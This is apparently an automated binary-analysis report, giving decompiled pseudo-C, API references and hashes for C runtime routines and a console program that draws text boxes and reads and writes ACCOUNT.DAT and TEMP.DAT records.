                                                								 *((char*)(_t154 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
                                                								_t38 = _t154 + 0xc; // 0xd
                                                								InitializeCriticalSectionAndSpinCount(_t38, 0xfa0);
                                                								_t39 = _t154 + 8;
                                                								 *_t39 =  *(_t154 + 8) + 1;
                                                								__eflags =  *_t39;
                                                								_t139 =  *(_t155 - 0x20);
                                                								L25:
                                                								_t135 =  *(_t155 - 0x1c);
                                                								goto L26;
                                                							}
                                                							_t119 = GetFileType(_t150);
                                                							_t139 =  *(_t155 - 0x20);
                                                							__eflags = _t119;
                                                							if(_t119 == 0) {
                                                								goto L25;
                                                							}
                                                							goto L24;
                                                						}
                                                						goto L31;
                                                					}
                                                					E012396F0(_t155, 0x1251380, _t155 - 0x10, 0xfffffffe);
                                                					_t86 = 0;
                                                					goto L3;
                                                				}
                                                				E012396F0(_t155, 0x1251380, _t155 - 0x10, 0xfffffffe);
                                                				goto L2;
                                                			}





























                                                0x0123a5e2
                                                0x0123a5e4
                                                0x0123a5e9
                                                0x0123a5f0
                                                0x0123a5f6
                                                0x0123a5f8
                                                0x0123a5fb
                                                0x0123a601
                                                0x0123a621
                                                0x0123a625
                                                0x0123a626
                                                0x0123a627
                                                0x0123a62e
                                                0x0123a630
                                                0x0123a633
                                                0x0123a635
                                                0x0123a64e
                                                0x0123a653
                                                0x0123a659
                                                0x0123a65e
                                                0x0123a660
                                                0x00000000
                                                0x00000000
                                                0x0123a662
                                                0x0123a668
                                                0x0123a66b
                                                0x0123a66e
                                                0x0123a677
                                                0x0123a67a
                                                0x0123a680
                                                0x0123a683
                                                0x0123a686
                                                0x0123a689
                                                0x0123a68c
                                                0x0123a68c
                                                0x0123a697
                                                0x0123a69d
                                                0x0123a6a2
                                                0x0123a7d1
                                                0x0123a7d1
                                                0x0123a7d1
                                                0x0123a7d4
                                                0x0123a7d7
                                                0x00000000
                                                0x00000000
                                                0x0123a7e2
                                                0x0123a7e8
                                                0x0123a7eb
                                                0x0123a7ee
                                                0x0123a803
                                                0x0123a803
                                                0x0123a807
                                                0x0123a809
                                                0x0123a810
                                                0x0123a815
                                                0x0123a817
                                                0x0123a817
                                                0x0123a80b
                                                0x0123a80d
                                                0x0123a80d
                                                0x0123a821
                                                0x0123a823
                                                0x0123a826
                                                0x0123a86d
                                                0x0123a873
                                                0x0123a876
                                                0x0123a87c
                                                0x0123a881
                                                0x0123a883
                                                0x0123a888
                                                0x0123a888
                                                0x00000000
                                                0x0123a828
                                                0x0123a828
                                                0x0123a82a
                                                0x00000000
                                                0x00000000
                                                0x0123a82d
                                                0x0123a833
                                                0x0123a835
                                                0x00000000
                                                0x00000000
                                                0x0123a837
                                                0x0123a839
                                                0x0123a83e
                                                0x0123a841
                                                0x0123a84b
                                                0x0123a84e
                                                0x0123a859
                                                0x0123a85e
                                                0x0123a862
                                                0x0123a868
                                                0x0123a88f
                                                0x0123a88f
                                                0x00000000
                                                0x0123a88f
                                                0x0123a854
                                                0x0123a854
                                                0x0123a856
                                                0x0123a856
                                                0x00000000
                                                0x0123a856
                                                0x0123a847
                                                0x00000000
                                                0x0123a847
                                                0x0123a826
                                                0x0123a7f0
                                                0x0123a7f3
                                                0x00000000
                                                0x00000000
                                                0x0123a7fb
                                                0x00000000
                                                0x0123a7fb
                                                0x0123a895
                                                0x0123a89c
                                                0x0123a616
                                                0x0123a618
                                                0x0123a619
                                                0x0123a61e
                                                0x0123a61e
                                                0x0123a6a8
                                                0x0123a6ab
                                                0x0123a6ad
                                                0x00000000
                                                0x00000000
                                                0x0123a6b3
                                                0x0123a6b5
                                                0x0123a6b8
                                                0x0123a6bb
                                                0x0123a6c0
                                                0x0123a6c8
                                                0x0123a6ca
                                                0x0123a6cc
                                                0x0123a6ce
                                                0x0123a6ce
                                                0x0123a6d3
                                                0x0123a6d3
                                                0x0123a6d4
                                                0x0123a6d7
                                                0x0123a6d7
                                                0x0123a6dd
                                                0x00000000
                                                0x00000000
                                                0x0123a6e9
                                                0x0123a6eb
                                                0x0123a6ee
                                                0x0123a6f0
                                                0x0123a784
                                                0x0123a78b
                                                0x0123a78b
                                                0x0123a791
                                                0x0123a79d
                                                0x0123a79f
                                                0x00000000
                                                0x00000000
                                                0x0123a7a1
                                                0x0123a7a7
                                                0x0123a7aa
                                                0x0123a7ad
                                                0x0123a7b1
                                                0x0123a7b7
                                                0x0123a7ba
                                                0x0123a7bd
                                                0x0123a7c0
                                                0x0123a7c0
                                                0x0123a7c5
                                                0x0123a7c6
                                                0x0123a7c9
                                                0x00000000
                                                0x0123a7c9
                                                0x0123a6f6
                                                0x0123a6fc
                                                0x00000000
                                                0x0123a6fc
                                                0x0123a6ff
                                                0x0123a701
                                                0x0123a704
                                                0x0123a707
                                                0x0123a70a
                                                0x0123a70a
                                                0x0123a70c
                                                0x00000000
                                                0x00000000
                                                0x0123a712
                                                0x0123a714
                                                0x0123a717
                                                0x0123a771
                                                0x0123a771
                                                0x0123a772
                                                0x0123a778
                                                0x0123a779
                                                0x0123a77c
                                                0x0123a77f
                                                0x00000000
                                                0x0123a77f
                                                0x0123a719
                                                0x0123a71c
                                                0x00000000
                                                0x00000000
                                                0x0123a71e
                                                0x0123a720
                                                0x0123a722
                                                0x00000000
                                                0x00000000
                                                0x0123a724
                                                0x0123a726
                                                0x0123a736
                                                0x0123a743
                                                0x0123a74a
                                                0x0123a74f
                                                0x0123a756
                                                0x0123a75e
                                                0x0123a762
                                                0x0123a768
                                                0x0123a768
                                                0x0123a768
                                                0x0123a76b
                                                0x0123a76e
                                                0x0123a76e
                                                0x00000000
                                                0x0123a76e
                                                0x0123a729
                                                0x0123a72f
                                                0x0123a732
                                                0x0123a734
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0123a734
                                                0x00000000
                                                0x0123a70a
                                                0x0123a642
                                                0x0123a64a
                                                0x00000000
                                                0x0123a64a
                                                0x0123a60e
                                                0x00000000

                                                APIs
                                                • __lock.LIBCMT ref: 0123A5F0
                                                  • Part of subcall function 0123BE5F: __mtinitlocknum.LIBCMT ref: 0123BE71
                                                  • Part of subcall function 0123BE5F: EnterCriticalSection.KERNEL32(?,?,0123D668,0000000D,?,?,?,?,0124DA28,00000008,0123D601,00000000,00000000,01238F04,01241E56,00000000), ref: 0123BE8A
                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 0123A60E
                                                • __calloc_crt.LIBCMT ref: 0123A627
                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 0123A642
                                                • GetStartupInfoW.KERNEL32(?,0124D8C0,00000064), ref: 0123A697
                                                • __calloc_crt.LIBCMT ref: 0123A6E2
                                                • GetFileType.KERNEL32(00000001), ref: 0123A729
                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0123A762
                                                • GetStdHandle.KERNEL32(-000000F6), ref: 0123A81B
                                                • GetFileType.KERNEL32(00000000), ref: 0123A82D
                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(-01252F54,00000FA0), ref: 0123A862
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CriticalSection$CallCountFileFilterFunc@8InitializeSpinType__calloc_crt$EnterHandleInfoStartup__lock__mtinitlocknum
                                                • String ID:
                                                • API String ID: 1456538442-0
                                                • Opcode ID: 7bd5386416da2a80b1bfe652698dc1ea5e87dc77cf984593b2a9860356245ecc
                                                • Instruction ID: d3a5339f0ff54ce574991e69b7e1bb8cd5b723a080aac4cff005c7f88482fc43
                                                • Opcode Fuzzy Hash: 7bd5386416da2a80b1bfe652698dc1ea5e87dc77cf984593b2a9860356245ecc
                                                • Instruction Fuzzy Hash: 9191E0B1924346CFDB25CFA8D8845ADBBB4AF85324B24426ED5A6EB2D1D7349803CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E01238E23(void* __eflags, signed int _a4) {
                                                				void* _t12;
                                                				signed int _t13;
                                                				signed int _t16;
                                                				intOrPtr _t18;
                                                				void* _t22;
                                                				signed int _t35;
                                                				long _t40;
                                                
                                                				_t13 = E0123A5A7(_t12);
                                                				if(_t13 >= 0) {
                                                					_t35 = _a4;
                                                					if(E01240132(_t35) == 0xffffffff) {
                                                						L10:
                                                						_t40 = 0;
                                                					} else {
                                                						_t18 =  *0x1252f60; // 0x0
                                                						if(_t35 != 1 || ( *(_t18 + 0x84) & 0x00000001) == 0) {
                                                							if(_t35 != 2 || ( *(_t18 + 0x44) & 0x00000001) == 0) {
                                                								goto L8;
                                                							} else {
                                                								goto L7;
                                                							}
                                                						} else {
                                                							L7:
                                                							_t22 = E01240132(2);
                                                							if(E01240132(1) == _t22) {
                                                								goto L10;
                                                							} else {
                                                								L8:
                                                								if(CloseHandle(E01240132(_t35)) != 0) {
                                                									goto L10;
                                                								} else {
                                                									_t40 = GetLastError();
                                                								}
                                                							}
                                                						}
                                                					}
                                                					E012400AC(_t35);
                                                					 *((char*)( *((intOrPtr*)(0x1252f60 + (_t35 >> 5) * 4)) + ((_t35 & 0x0000001f) << 6) + 4)) = 0;
                                                					if(_t40 == 0) {
                                                						_t16 = 0;
                                                					} else {
                                                						_t16 = E01238EDE(_t40) | 0xffffffff;
                                                					}
                                                					return _t16;
                                                				} else {
                                                					return _t13 | 0xffffffff;
                                                				}
                                                			}










                                                0x01238e26
                                                0x01238e2d
                                                0x01238e36
                                                0x01238e43
                                                0x01238e95
                                                0x01238e95
                                                0x01238e45
                                                0x01238e45
                                                0x01238e4d
                                                0x01238e5b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01238e63
                                                0x01238e63
                                                0x01238e65
                                                0x01238e77
                                                0x00000000
                                                0x01238e79
                                                0x01238e79
                                                0x01238e89
                                                0x00000000
                                                0x01238e8b
                                                0x01238e91
                                                0x01238e91
                                                0x01238e89
                                                0x01238e77
                                                0x01238e4d
                                                0x01238e98
                                                0x01238eb0
                                                0x01238eb7
                                                0x01238ec5
                                                0x01238eb9
                                                0x01238ec0
                                                0x01238ec0
                                                0x01238eca
                                                0x01238e2f
                                                0x01238e33
                                                0x01238e33

                                                APIs
                                                • __ioinit.LIBCMT ref: 01238E26
                                                  • Part of subcall function 0123A5A7: InitOnceExecuteOnce.KERNEL32(0125229C,0123A5E2,00000000,00000000,01241205,?,?,01239886,00000000,?,?,?,012371AD,-00000020,0124D7B8,0000000C), ref: 0123A5B5
                                                • __get_osfhandle.LIBCMT ref: 01238E3A
                                                • __get_osfhandle.LIBCMT ref: 01238E65
                                                • __get_osfhandle.LIBCMT ref: 01238E6E
                                                • __get_osfhandle.LIBCMT ref: 01238E7A
                                                • CloseHandle.KERNEL32(00000000,01232656,00000000,?,012441AB,01232656,?,?,?,?,?,?,?,01232656,00000000,00000109), ref: 01238E81
                                                • GetLastError.KERNEL32(?,012441AB,01232656,?,?,?,?,?,?,?,01232656,00000000,00000109), ref: 01238E8B
                                                • __free_osfhnd.LIBCMT ref: 01238E98
                                                • __dosmaperr.LIBCMT ref: 01238EBA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: __get_osfhandle$Once$CloseErrorExecuteHandleInitLast__dosmaperr__free_osfhnd__ioinit
                                                • String ID:
                                                • API String ID: 974577687-0
                                                • Opcode ID: 8d684c59b6378d56574df08a52cb65e741712e5cc6b8dc3aea46e737f3c48de3
                                                • Instruction ID: 2e61fbbffd079c0724c4cb380e572d66de274ccfef6c0ece69cbc68b92e70275
                                                • Opcode Fuzzy Hash: 8d684c59b6378d56574df08a52cb65e741712e5cc6b8dc3aea46e737f3c48de3
                                                • Instruction Fuzzy Hash: 921125B2A312125AE636227CA84877E7B595FD1734F150309FB288F1C2EAB4D4818260
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 01236EF1: __fsopen.LIBCMT ref: 01236EFC
                                                • _swscanf.LIBCMT ref: 01233B48
                                                  • Part of subcall function 01237021: _vfscanf.LIBCMT ref: 01237035
                                                • _fprintf.LIBCMT ref: 01233DA6
                                                Strings
                                                • TEMP.DAT, xrefs: 01233AE2
                                                • ACCOUNT.DAT, xrefs: 01233ABE
                                                • %s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 01233B3D
                                                • %s %s %s %s %s %s %c %s %c %.2f %.2f %.2f, xrefs: 01233D9A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: __fsopen_fprintf_swscanf_vfscanf
                                                • String ID: %s %s %s %s %s %s %c %s %c %.2f %.2f %.2f$%s %s %s %s %s %s %c %s %c %f %f %f$ACCOUNT.DAT$TEMP.DAT
                                                • API String ID: 1563022539-2055742014
                                                • Opcode ID: 096a3f031dae880d0dca30786343e2b8a2f2da7bf0c031cd899281287a665c27
                                                • Instruction ID: 1e0091e21be034537487b3644022e42d3baa6bba919610de958e542c07569839
                                                • Opcode Fuzzy Hash: 096a3f031dae880d0dca30786343e2b8a2f2da7bf0c031cd899281287a665c27
                                                • Instruction Fuzzy Hash: 5491A672D105599FCB09DFA8E991BEDFBB9FF85300F04826EE006BA185E6745684CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 76%
                                                			E01231380(void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                				intOrPtr _v8;
                                                				intOrPtr _v12;
                                                				void* __ebp;
                                                				intOrPtr _t61;
                                                				intOrPtr _t67;
                                                				void* _t75;
                                                				intOrPtr _t87;
                                                				void* _t103;
                                                				void* _t104;
                                                				void* _t105;
                                                				void* _t106;
                                                
                                                				_t102 = __esi;
                                                				_t101 = __edi;
                                                				E012312B0(_a4, _a8);
                                                				_push(0xc9);
                                                				_push("%c");
                                                				E0123715C(_t75, __edi, __esi, __eflags);
                                                				_t104 = _t103 + 8;
                                                				_v8 = _a4 + 1;
                                                				while(1) {
                                                					_t109 = _v8 - _a12 - 1;
                                                					if(_v8 >= _a12 - 1) {
                                                						break;
                                                					}
                                                					E012312B0(_v8, _a8);
                                                					_push(0xcd);
                                                					_push("%c");
                                                					E0123715C(_t75, _t101, _t102, _t109);
                                                					_t104 = _t104 + 8;
                                                					_v8 = _v8 + 1;
                                                				}
                                                				E012312B0(_v8, _a8);
                                                				_push(0xbb);
                                                				_push("%c");
                                                				E0123715C(_t75, _t101, _t102, __eflags);
                                                				_t105 = _t104 + 8;
                                                				_v12 = _a8 + 1;
                                                				while(1) {
                                                					__eflags = _v12 - _a16;
                                                					if(__eflags >= 0) {
                                                						break;
                                                					}
                                                					E012312B0(_a4, _v12);
                                                					_v8 = _a4;
                                                					while(1) {
                                                						__eflags = _v8 - _a12;
                                                						if(_v8 >= _a12) {
                                                							break;
                                                						}
                                                						__eflags = _v8 - _a4;
                                                						if(__eflags == 0) {
                                                							L12:
                                                							E012312B0(_v8, _v12);
                                                							_push(0xba);
                                                							_push("%c");
                                                							E0123715C(_t75, _t101, _t102, __eflags);
                                                							_t105 = _t105 + 8;
                                                						} else {
                                                							__eflags = _v8 - _a12 - 1;
                                                							if(__eflags == 0) {
                                                								goto L12;
                                                							}
                                                						}
                                                						_t67 = _v8 + 1;
                                                						__eflags = _t67;
                                                						_v8 = _t67;
                                                					}
                                                					_t87 = _v12 + 1;
                                                					__eflags = _t87;
                                                					_v12 = _t87;
                                                				}
                                                				E012312B0(_a4, _v12);
                                                				_push(0xc8);
                                                				_push("%c");
                                                				E0123715C(_t75, _t101, _t102, __eflags);
                                                				_t106 = _t105 + 8;
                                                				_v8 = _a4 + 1;
                                                				while(1) {
                                                					__eflags = _v8 - _a12 - 1;
                                                					if(__eflags >= 0) {
                                                						break;
                                                					}
                                                					E012312B0(_v8, _v12);
                                                					_push(0xcd);
                                                					_push("%c");
                                                					E0123715C(_t75, _t101, _t102, __eflags);
                                                					_t106 = _t106 + 8;
                                                					_t61 = _v8 + 1;
                                                					__eflags = _t61;
                                                					_v8 = _t61;
                                                				}
                                                				E012312B0(_v8, _v12);
                                                				_push(0xbc);
                                                				_push("%c");
                                                				return E0123715C(_t75, _t101, _t102, __eflags);
                                                			}














                                                0x01231380
                                                0x01231380
                                                0x0123138e
                                                0x01231393
                                                0x01231398
                                                0x0123139d
                                                0x012313a2
                                                0x012313ab
                                                0x012313b9
                                                0x012313bf
                                                0x012313c2
                                                0x00000000
                                                0x00000000
                                                0x012313cc
                                                0x012313d1
                                                0x012313d6
                                                0x012313db
                                                0x012313e0
                                                0x012313b6
                                                0x012313b6
                                                0x012313ed
                                                0x012313f2
                                                0x012313f7
                                                0x012313fc
                                                0x01231401
                                                0x0123140a
                                                0x01231418
                                                0x0123141b
                                                0x0123141e
                                                0x00000000
                                                0x00000000
                                                0x01231428
                                                0x01231430
                                                0x0123143e
                                                0x01231441
                                                0x01231444
                                                0x00000000
                                                0x00000000
                                                0x01231449
                                                0x0123144c
                                                0x01231459
                                                0x01231461
                                                0x01231466
                                                0x0123146b
                                                0x01231470
                                                0x01231475
                                                0x0123144e
                                                0x01231454
                                                0x01231457
                                                0x00000000
                                                0x00000000
                                                0x01231457
                                                0x01231438
                                                0x01231438
                                                0x0123143b
                                                0x0123143b
                                                0x01231412
                                                0x01231412
                                                0x01231415
                                                0x01231415
                                                0x01231484
                                                0x01231489
                                                0x0123148e
                                                0x01231493
                                                0x01231498
                                                0x012314a1
                                                0x012314af
                                                0x012314b5
                                                0x012314b8
                                                0x00000000
                                                0x00000000
                                                0x012314c2
                                                0x012314c7
                                                0x012314cc
                                                0x012314d1
                                                0x012314d6
                                                0x012314a9
                                                0x012314a9
                                                0x012314ac
                                                0x012314ac
                                                0x012314e3
                                                0x012314e8
                                                0x012314ed
                                                0x012314fd

                                                APIs
                                                  • Part of subcall function 012312B0: GetStdHandle.KERNEL32(000000F5,00000000,?,01231393,?,?,?,01231236), ref: 012312D1
                                                  • Part of subcall function 012312B0: SetConsoleCursorPosition.KERNEL32(00000000,?,01231393,?,?,?,01231236), ref: 012312D8
                                                • _wprintf.LIBCMT ref: 0123139D
                                                • _wprintf.LIBCMT ref: 012313DB
                                                  • Part of subcall function 0123715C: __stbuf.LIBCMT ref: 012371A8
                                                  • Part of subcall function 0123715C: __output_s_l.LIBCMT ref: 012371C2
                                                  • Part of subcall function 0123715C: __ftbuf.LIBCMT ref: 012371D6
                                                • _wprintf.LIBCMT ref: 012313FC
                                                • _wprintf.LIBCMT ref: 01231470
                                                • _wprintf.LIBCMT ref: 01231493
                                                • _wprintf.LIBCMT ref: 012314D1
                                                • _wprintf.LIBCMT ref: 012314F2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: _wprintf$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf
                                                • String ID:
                                                • API String ID: 1778593935-0
                                                • Opcode ID: d565dd80be8008ec78f8ceb4850a97238b3a12cb881bf5c464ebe02ef2e5c193
                                                • Instruction ID: 8c03bac9d8d8c861079f4183ec1c32dae2de8ece5af7cbee838b039b6d6bb4dd
                                                • Opcode Fuzzy Hash: d565dd80be8008ec78f8ceb4850a97238b3a12cb881bf5c464ebe02ef2e5c193
                                                • Instruction Fuzzy Hash: F84133F5A3420AFBCB04EFA8CD41EAE7775EFD5300F108159EA05AB340D670AB649B95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			E0123D6D2(void* __ebx, void* __edi) {
                                                				void* __esi;
                                                				void* _t3;
                                                				intOrPtr _t6;
                                                				long _t14;
                                                				long* _t27;
                                                
                                                				E012375FE(_t3);
                                                				if(E0123BF8E() != 0) {
                                                					_t6 = E0123BFD8(_t5, E0123D468);
                                                					 *0x1251a40 = _t6;
                                                					__eflags = _t6 - 0xffffffff;
                                                					if(_t6 == 0xffffffff) {
                                                						goto L1;
                                                					} else {
                                                						_t27 = E0123C55B(1, 0x3b8);
                                                						__eflags = _t27;
                                                						if(_t27 == 0) {
                                                							L6:
                                                							E0123D748();
                                                							__eflags = 0;
                                                							return 0;
                                                						} else {
                                                							__eflags = E0123C002(_t9,  *0x1251a40, _t27);
                                                							if(__eflags == 0) {
                                                								goto L6;
                                                							} else {
                                                								_push(0);
                                                								_push(_t27);
                                                								E0123D626(__ebx, __edi, _t27, __eflags);
                                                								_t14 = GetCurrentThreadId();
                                                								_t27[1] = _t27[1] | 0xffffffff;
                                                								 *_t27 = _t14;
                                                								__eflags = 1;
                                                								return 1;
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					L1:
                                                					E0123D748();
                                                					return 0;
                                                				}
                                                			}








                                                0x0123d6d2
                                                0x0123d6de
                                                0x0123d6ed
                                                0x0123d6f3
                                                0x0123d6f8
                                                0x0123d6fb
                                                0x00000000
                                                0x0123d6fd
                                                0x0123d70a
                                                0x0123d70e
                                                0x0123d710
                                                0x0123d73f
                                                0x0123d73f
                                                0x0123d744
                                                0x0123d747
                                                0x0123d712
                                                0x0123d720
                                                0x0123d722
                                                0x00000000
                                                0x0123d724
                                                0x0123d724
                                                0x0123d726
                                                0x0123d727
                                                0x0123d72e
                                                0x0123d734
                                                0x0123d738
                                                0x0123d73c
                                                0x0123d73e
                                                0x0123d73e
                                                0x0123d722
                                                0x0123d710
                                                0x0123d6e0
                                                0x0123d6e0
                                                0x0123d6e0
                                                0x0123d6e7
                                                0x0123d6e7

                                                APIs
                                                • __init_pointers.LIBCMT ref: 0123D6D2
                                                  • Part of subcall function 012375FE: EncodePointer.KERNEL32(00000000,?,0123D6D7,0123892B,0124D838,00000014), ref: 01237601
                                                  • Part of subcall function 012375FE: __initp_misc_winsig.LIBCMT ref: 01237622
                                                • __mtinitlocks.LIBCMT ref: 0123D6D7
                                                  • Part of subcall function 0123BF8E: InitializeCriticalSectionAndSpinCount.KERNEL32(012513D0,00000FA0,?,?,0123D6DC,0123892B,0124D838,00000014), ref: 0123BFAC
                                                • __mtterm.LIBCMT ref: 0123D6E0
                                                • __calloc_crt.LIBCMT ref: 0123D705
                                                • __initptd.LIBCMT ref: 0123D727
                                                • GetCurrentThreadId.KERNEL32 ref: 0123D72E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CountCriticalCurrentEncodeInitializePointerSectionSpinThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm
                                                • String ID:
                                                • API String ID: 2211675822-0
                                                • Opcode ID: 9295f8d04cf5905bfba25c83ee9590b70e321e08d59421d6f0bf874627e8c1c3
                                                • Instruction ID: 7980fe4ec559113fe8c3f0a295304233713501a1f50290607d484c6b11b841ea
                                                • Opcode Fuzzy Hash: 9295f8d04cf5905bfba25c83ee9590b70e321e08d59421d6f0bf874627e8c1c3
                                                • Instruction Fuzzy Hash: 91F0F6F25797571BE73A3ABC780676636D48BD1670B60061AF525D60C4EE20D0418594
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 88%
                                                			E0123BB6C(void* __eflags, signed char _a4, signed int* _a8) {
                                                				signed int _v8;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				void* _t43;
                                                				signed int _t44;
                                                				signed int _t45;
                                                				signed int _t48;
                                                				signed int _t52;
                                                				void* _t60;
                                                				signed int _t62;
                                                				void* _t64;
                                                				signed int _t67;
                                                				signed int _t70;
                                                				signed int _t74;
                                                				signed int _t76;
                                                				void* _t77;
                                                				signed int _t85;
                                                				void* _t86;
                                                				signed int _t87;
                                                				signed int _t89;
                                                				signed int* _t92;
                                                
                                                				_t44 = E0123A5A7(_t43);
                                                				if(_t44 >= 0) {
                                                					_t92 = _a8;
                                                					_t45 = E01238BB2(_t92);
                                                					_t74 = _t92[3];
                                                					_t89 = _t45;
                                                					__eflags = _t74 & 0x00000082;
                                                					if(__eflags != 0) {
                                                						__eflags = _t74 & 0x00000040;
                                                						if(__eflags == 0) {
                                                							_t70 = 0;
                                                							__eflags = _t74 & 0x00000001;
                                                							if((_t74 & 0x00000001) == 0) {
                                                								L10:
                                                								_t48 = _t92[3] & 0xffffffef | 0x00000002;
                                                								_t92[3] = _t48;
                                                								_t92[1] = _t70;
                                                								__eflags = _t48 & 0x0000010c;
                                                								if((_t48 & 0x0000010c) == 0) {
                                                									_t60 = E01238C70();
                                                									__eflags = _t92 - _t60 + 0x20;
                                                									if(_t92 == _t60 + 0x20) {
                                                										L13:
                                                										_t62 = E012411E7(_t89);
                                                										__eflags = _t62;
                                                										if(_t62 == 0) {
                                                											goto L14;
                                                										}
                                                									} else {
                                                										_t64 = E01238C70();
                                                										__eflags = _t92 - _t64 + 0x40;
                                                										if(_t92 != _t64 + 0x40) {
                                                											L14:
                                                											E0124192E(_t92);
                                                										} else {
                                                											goto L13;
                                                										}
                                                									}
                                                								}
                                                								__eflags = _t92[3] & 0x00000108;
                                                								if((_t92[3] & 0x00000108) == 0) {
                                                									__eflags = 1;
                                                									_push(1);
                                                									_v8 = 1;
                                                									_push( &_a4);
                                                									_push(_t89);
                                                									_t45 = E01240343(_t70, _t86, _t89, _t92, 1);
                                                									_t70 = _t45;
                                                									goto L27;
                                                								} else {
                                                									_t87 = _t92[2];
                                                									_t25 = _t87 + 1; // 0x1a06
                                                									 *_t92 = _t25;
                                                									_t76 =  *_t92 - _t87;
                                                									_v8 = _t76;
                                                									_t92[1] = _t92[6] - 1;
                                                									__eflags = _t76;
                                                									if(__eflags <= 0) {
                                                										__eflags = _t89 - 0xffffffff;
                                                										if(_t89 == 0xffffffff) {
                                                											L22:
                                                											_t77 = 0x1251390;
                                                										} else {
                                                											__eflags = _t89 - 0xfffffffe;
                                                											if(_t89 == 0xfffffffe) {
                                                												goto L22;
                                                											} else {
                                                												_t77 = ((_t89 & 0x0000001f) << 6) +  *((intOrPtr*)(0x1252f60 + (_t89 >> 5) * 4));
                                                											}
                                                										}
                                                										__eflags =  *(_t77 + 4) & 0x00000020;
                                                										if(__eflags == 0) {
                                                											goto L25;
                                                										} else {
                                                											_push(2);
                                                											_push(_t70);
                                                											_push(_t70);
                                                											_push(_t89);
                                                											_t45 = E012417B4(_t70, _t89, _t92, __eflags) & _t87;
                                                											__eflags = _t45 - 0xffffffff;
                                                											if(_t45 == 0xffffffff) {
                                                												goto L28;
                                                											} else {
                                                												goto L25;
                                                											}
                                                										}
                                                									} else {
                                                										_push(_t76);
                                                										_push(_t87);
                                                										_push(_t89);
                                                										_t70 = E01240343(_t70, _t87, _t89, _t92, __eflags);
                                                										L25:
                                                										_t45 = _a4;
                                                										 *(_t92[2]) = _t45;
                                                										L27:
                                                										__eflags = _t70 - _v8;
                                                										if(_t70 == _v8) {
                                                											_t52 = _a4 & 0x000000ff;
                                                										} else {
                                                											L28:
                                                											_t40 =  &(_t92[3]);
                                                											 *_t40 = _t92[3] | 0x00000020;
                                                											__eflags =  *_t40;
                                                											goto L29;
                                                										}
                                                									}
                                                								}
                                                							} else {
                                                								_t92[1] = 0;
                                                								__eflags = _t74 & 0x00000010;
                                                								if((_t74 & 0x00000010) == 0) {
                                                									_t92[3] = _t74 | 0x00000020;
                                                									L29:
